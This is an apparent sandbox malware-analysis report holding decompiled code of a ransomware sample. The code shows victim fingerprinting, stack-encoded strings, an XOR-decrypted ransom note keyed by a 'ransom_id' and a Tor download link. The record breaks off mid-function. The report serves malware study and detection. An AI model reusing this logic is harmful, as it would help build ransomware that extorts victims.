Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-983031137
Opcode ID: 414636666c9e15e4698c1a2d652c3a3c5272efe64215adb74e434441d4c1ad87
Instruction ID: 376cde7a69008b2288c8eab35a37405bdc6fc85121decb84cce6463b8208e381
Opcode Fuzzy Hash: 414636666c9e15e4698c1a2d652c3a3c5272efe64215adb74e434441d4c1ad87
Instruction Fuzzy Hash: EE129F70A40305FBEB209BA5EC4AFEABBB8FB48701F20055DF641A6191DBF4A514CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB7E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBB8024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBB803D

Strings

T, xrefs: 0FBB7F75
3, xrefs: 0FBB7FE5
5, xrefs: 0FBB7FC9
K, xrefs: 0FBB7F6E
3, xrefs: 0FBB801D
7, xrefs: 0FBB8016
6, xrefs: 0FBB7EDD
G, xrefs: 0FBB7F98
o, xrefs: 0FBB7FA6
e, xrefs: 0FBB7F91
i, xrefs: 0FBB7EAB
i, xrefs: 0FBB8008
c, xrefs: 0FBB7F9F
, xrefs: 0FBB7F67
), xrefs: 0FBB7F0F
5, xrefs: 0FBB7E8D
p, xrefs: 0FBB7F23
A, xrefs: 0FBB7F19
L, xrefs: 0FBB7F7C
a, xrefs: 0FBB8001
8, xrefs: 0FBB7FDE
l, xrefs: 0FBB7E79
, xrefs: 0FBB7EF1
., xrefs: 0FBB7FD0
e, xrefs: 0FBB7FC2
z, xrefs: 0FBB7E6F
, xrefs: 0FBB7F83
8, xrefs: 0FBB7FEC
t, xrefs: 0FBB7F4B
T, xrefs: 0FBB7ED3
e, xrefs: 0FBB7F2D
h, xrefs: 0FBB7FB4
e, xrefs: 0FBB7F37
a, xrefs: 0FBB7E83
., xrefs: 0FBB7FD7
, xrefs: 0FBB7FAD
, xrefs: 0FBB7EC9
w, xrefs: 0FBB7EBF
M, xrefs: 0FBB7E64
, xrefs: 0FBB7FF3
d, xrefs: 0FBB7EB5
0, xrefs: 0FBB7E97
(, xrefs: 0FBB7EA1
7, xrefs: 0FBB7F59
3, xrefs: 0FBB7F60
5, xrefs: 0FBB800F
5, xrefs: 0FBB7F52
o, xrefs: 0FBB7FBB
a, xrefs: 0FBB7FFA
6, xrefs: 0FBB7F05
i, xrefs: 0FBB7F8A
O, xrefs: 0FBB7EFB
K, xrefs: 0FBB7F41
1, xrefs: 0FBB7EE7

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 2a43059aaa1cdd198d0955a693a525dae4483c2b2bbd27d41a80047c9b8d1647
Instruction ID: 899e7eaa8ae25ea04683d6bb64e163c3d5ace84c1c79c152d12d4c3c8b0ef563
Opcode Fuzzy Hash: 2a43059aaa1cdd198d0955a693a525dae4483c2b2bbd27d41a80047c9b8d1647
Instruction Fuzzy Hash: 1541B7B4811358DEEB218F91999879EBFF5BB00748F50818EC5086B201C7F60A89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB70A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB70A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

APIs

lstrcatW.KERNEL32(?,?), ref: 0FBB70C1
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB70C9
lstrcatW.KERNEL32(?,?), ref: 0FBB70D2
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB70DA
lstrcatW.KERNEL32(?,?), ref: 0FBB70E5
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB70ED
lstrcatW.KERNEL32(?,?), ref: 0FBB70F3
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB70FB
lstrcatW.KERNEL32(?,?), ref: 0FBB7107
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB710F
lstrcatW.KERNEL32(?,?), ref: 0FBB7115
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB711D
lstrcatW.KERNEL32(?,?), ref: 0FBB7129
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB7131
lstrcatW.KERNEL32(?,?), ref: 0FBB7137
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB713F
lstrcatW.KERNEL32(?,?), ref: 0FBB714B
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB7153
lstrcatW.KERNEL32(?,?), ref: 0FBB7159
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB7161
lstrcatW.KERNEL32(?,?), ref: 0FBB716D
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB7175
lstrcatW.KERNEL32(?,?), ref: 0FBB717B
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB7183
lstrcatW.KERNEL32(?,0FBB4B36), ref: 0FBB718F
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB7197
lstrcatW.KERNEL32(?,?), ref: 0FBB719D
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB71A5
lstrcatW.KERNEL32(?,?), ref: 0FBB71B1
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB71B9
lstrcatW.KERNEL32(?,?), ref: 0FBB71BF
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB71C7
lstrcatW.KERNEL32(?,?), ref: 0FBB71D3
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB71DB
lstrcatW.KERNEL32(?,?), ref: 0FBB71E1
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB71E9
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FBB4869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FBB71FC
wsprintfW.USER32 ref: 0FBB7216
wsprintfW.USER32 ref: 0FBB7227
lstrcatW.KERNEL32(?,?), ref: 0FBB7234
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB723C
lstrcatW.KERNEL32(?,?), ref: 0FBB7242
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB7256
lstrcatW.KERNEL32(?,?), ref: 0FBB7266
lstrcatW.KERNEL32(?,0FBBFFD0), ref: 0FBB726E
lstrcatW.KERNEL32(?,?), ref: 0FBB7274
lstrcatW.KERNEL32(?,0FBBFFD4), ref: 0FBB727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FBB4869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB727F

Strings

undefined, xrefs: 0FBB7221
%x%x, xrefs: 0FBB7210

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 4024856bf4fcca77e2d5ac1e87650e6f8b2dfd96213b9a6f93152447159d423a
Instruction ID: 444e531b73365f6fad913aced759180256794b7bc7a375e4c81ffed718622eeb
Opcode Fuzzy Hash: 4024856bf4fcca77e2d5ac1e87650e6f8b2dfd96213b9a6f93152447159d423a
Instruction Fuzzy Hash: CC512135146698B6CB273FA59C49FFF3A19EFC6701F020098F9101406A8BE99252DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB42B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0FBB42B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfbc2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FBB3BC0( &_v148);
				E0FBB7490( &_v236, __edx); // executed
				_t97 = E0FBB72A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FBB70A0( &_v152, _t98); // executed
				_t60 = E0FBB81F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfbc0510]");
				_t77 = 0xfbc2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfbc2000) =  *(_t62 + 0xfbc2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfbc2a64 = 0xfbc2000;
				_t94 = E0FBB81F0(0xfbc2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfbc2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xfbc2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0FBB7D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfbc2000;
					_t69 =  *0xfbc2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfbc2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

APIs

Part of subcall function 0FBB3BC0: GetProcessHeap.KERNEL32(?,?,0FBB4807,00000000,?,00000000,00000000), ref: 0FBB3C5C

Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FBB74B7
Part of subcall function 0FBB7490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBB74C8
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FBB74E6
Part of subcall function 0FBB7490: GetComputerNameW.KERNEL32 ref: 0FBB74F0
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB7510
Part of subcall function 0FBB7490: wsprintfW.USER32 ref: 0FBB7551
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB756E
Part of subcall function 0FBB7490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
Part of subcall function 0FBB7490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
Part of subcall function 0FBB7490: RegCloseKey.KERNELBASE(00000000), ref: 0FBB75D2

Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4363
lstrcpyW.KERNEL32 ref: 0FBB43E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB43E9

Strings

/, xrefs: 0FBB4475
a, xrefs: 0FBB4515
w, xrefs: 0FBB44F5
l, xrefs: 0FBB44FD
n, xrefs: 0FBB453D
t, xrefs: 0FBB4465
m, xrefs: 0FBB452D
j, xrefs: 0FBB44A5
r, xrefs: 0FBB449D
/, xrefs: 0FBB44C5
h, xrefs: 0FBB4525
y, xrefs: 0FBB451D
h, xrefs: 0FBB445D
-, xrefs: 0FBB450D
w, xrefs: 0FBB447D
d, xrefs: 0FBB44ED
r, xrefs: 0FBB44BD
c, xrefs: 0FBB44AD
., xrefs: 0FBB4535
s, xrefs: 0FBB446D
a, xrefs: 0FBB4505
{USERID}, xrefs: 0FBB43BF, 0FBB440D, 0FBB4413
o, xrefs: 0FBB44DD
d, xrefs: 0FBB44E5
o, xrefs: 0FBB44CD
ransom_id=, xrefs: 0FBB4350, 0FBB435C
r, xrefs: 0FBB4495
., xrefs: 0FBB44B5
w, xrefs: 0FBB4485
n, xrefs: 0FBB44D5
t, xrefs: 0FBB448D

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 070379627d013955b5c33d3bb922b32e590e2492c9268c5f8374c0f72077b99c
Instruction ID: 7919872ce358788d209845d68867fbf968fa35fae1ebb9b86a7510e9241b09a4
Opcode Fuzzy Hash: 070379627d013955b5c33d3bb922b32e590e2492c9268c5f8374c0f72077b99c
Instruction Fuzzy Hash: 2971FB70504340DBE720DF14E8197BB7BE1FB80748F50495CEA881B292EBF99949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB43A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB43A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfbc2000) =  *(_t41 + 0xfbc2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfbc2a64 = 0xfbc2000;
				_t60 = E0FBB81F0(0xfbc2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfbc2000;
						_t49 =  *0xfbc2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfbc2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
